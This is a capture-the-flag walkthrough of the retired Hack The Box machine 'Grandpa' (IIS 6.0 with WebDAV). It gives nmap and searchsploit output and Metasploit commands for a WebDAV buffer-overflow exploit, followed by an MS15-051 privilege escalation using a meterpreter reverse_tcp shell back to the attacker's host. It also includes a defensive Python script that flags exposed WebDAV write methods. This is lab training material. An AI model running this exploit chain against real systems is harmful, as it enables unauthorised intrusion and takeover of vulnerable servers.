Grandpa

Name: Grandpa
Release Date: 12 Apr 2017
Retire Date: 21 Oct 2017
OS: Windows
Base Points: Easy - Retired [0]
v4l3r0n 00 days, 07 hours, 25 mins, 06 seconds
v4l3r0n 00 days, 07 hours, 25 mins, 34 seconds
Creator: ch4p
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -oA ./Grandpa 10.10.10.14

$ nmap -sC -sV -oA ./Grandpa 10.10.10.14
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-02 17:16 EDT
  Nmap scan report for 10.10.10.14
  Host is up (0.060s latency).
  Not shown: 999 filtered ports
  PORT   STATE SERVICE VERSION
  80/tcp open  http    Microsoft IIS httpd 6.0
  | http-methods: 
  |_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
  |_http-server-header: Microsoft-IIS/6.0
  |_http-title: Under Construction
  | http-webdav-scan: 
  |   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
  |   Server Type: Microsoft-IIS/6.0
  |   WebDAV type: Unknown
  |   Server Date: Thu, 02 Apr 2020 21:17:00 GMT
  |_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  
  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 27.97 seconds

One port.  This is either going to be hyper-easy or ridiculously hard. IIS 6.0 should have a slew of vulnerabilities in it.
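As an added example (not part of the original writeup), here is a small Python triage script for the nmap normal output above: it parses the http-methods and http-webdav-scan lines and flags every host that still advertises write-capable WebDAV methods, which is exactly the exposure this box trades on. The sample scan text is constructed from the output shown above.

```python
"""Triage nmap http-methods / http-webdav-scan output for write-capable WebDAV methods."""
import re

# HTTP/WebDAV methods that let a client create, change, move or delete server content.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}

# Constructed sample mirroring the scan output earlier on the page.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.14
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
"""


def parse_scan(text):
    """Return {host: {"server": str, "methods": set}} from nmap normal (-oN) output."""
    hosts, host = {}, None
    for line in text.splitlines():
        m = re.match(r"Nmap scan report for (\S+)", line)
        if m:
            host = m.group(1)
            hosts[host] = {"server": "", "methods": set()}
            continue
        if host is None:
            continue
        m = re.search(r"http-server-header: (.+)", line)
        if m:
            hosts[host]["server"] = m.group(1).strip()
        # Methods are space-separated in http-methods and comma-separated in http-webdav-scan.
        m = re.search(r"(?:Potentially risky methods|Allowed Methods|Public Options): (.+)", line)
        if m:
            hosts[host]["methods"] |= set(re.split(r"[,\s]+", m.group(1).strip()))
    return hosts


def triage(hosts):
    """Map each host to the sorted write-capable methods it advertises (empty list = nothing to fix)."""
    return {h: sorted(WRITE_METHODS & d["methods"]) for h, d in hosts.items()}


if __name__ == "__main__":
    for host, methods in triage(parse_scan(SAMPLE_SCAN)).items():
        status = "write methods exposed: " + ", ".join(methods) if methods else "clean"
        print(f"{host}: {status}")
```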

kali@kali:~/Grandpa$ searchsploit iis 6
  ------------------------------------------------------------------------------------------------------------------- ----------------------------------------
   Exploit Title                                                                                                     |  Path
                                                                                                                   | (/usr/share/exploitdb/)
  ------------------------------------------------------------------------------------------------------------------- ----------------------------------------
  Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure                                   | exploits/windows/remote/21057.txt
  Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow                                            | exploits/windows/remote/9541.pl
  Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service                                              | exploits/windows/dos/9587.txt
  Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service                                                       | exploits/windows/dos/3965.pl
  Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065)                             | exploits/windows/dos/15167.txt
  Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow                                           | exploits/windows/remote/41738.py
  Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                                                        | exploits/windows/remote/8704.txt
  Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                                                        | exploits/windows/remote/8806.pl
  Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)                                                      | exploits/windows/remote/8765.php
  Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                                                    | exploits/windows/remote/8754.patch
  Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities                                                           | exploits/windows/remote/19033.txt
  ------------------------------------------------------------------------------------------------------------------- ----------------------------------------
  Shellcodes: No Result

Side Note: A LOT more results showed up using that search, but I only included the ones that specifically called out IIS 6.0.


OK.  So, I am going to save you a whole LOT of time.  I know I despise using Metasploit.  It makes us lazy.  However, on this box, the non-MSF method is way too BUGGY.  Literally, it will kick you off your shell and you'll have to revert the box to get it back.  Trust me, go the MSF route.


msfconsole
  use exploit/windows/iis/iis_webdav_scstoragepathfromurl
  options
  set rhosts 10.10.10.14
  set lhost 10.10.XX.XX
  run

Once that runs, you can run it through the local exploit suggester in MSF.  The one I ended up using was MS15_051_client_copy_image.  So, background your meterpreter and use it.

background
  use exploit/windows/local/ms15_051_client_copy_image
  set session 3        # yours may be different
  set payload windows/meterpreter/reverse_tcp
  set LHOST 10.10.XX.XX
  run

When I initially ran it, it failed.  So I tried migrating, or piggybacking onto another process.  wmiprvse.exe sounded good.

Grab the flags and kiss this one goodbye.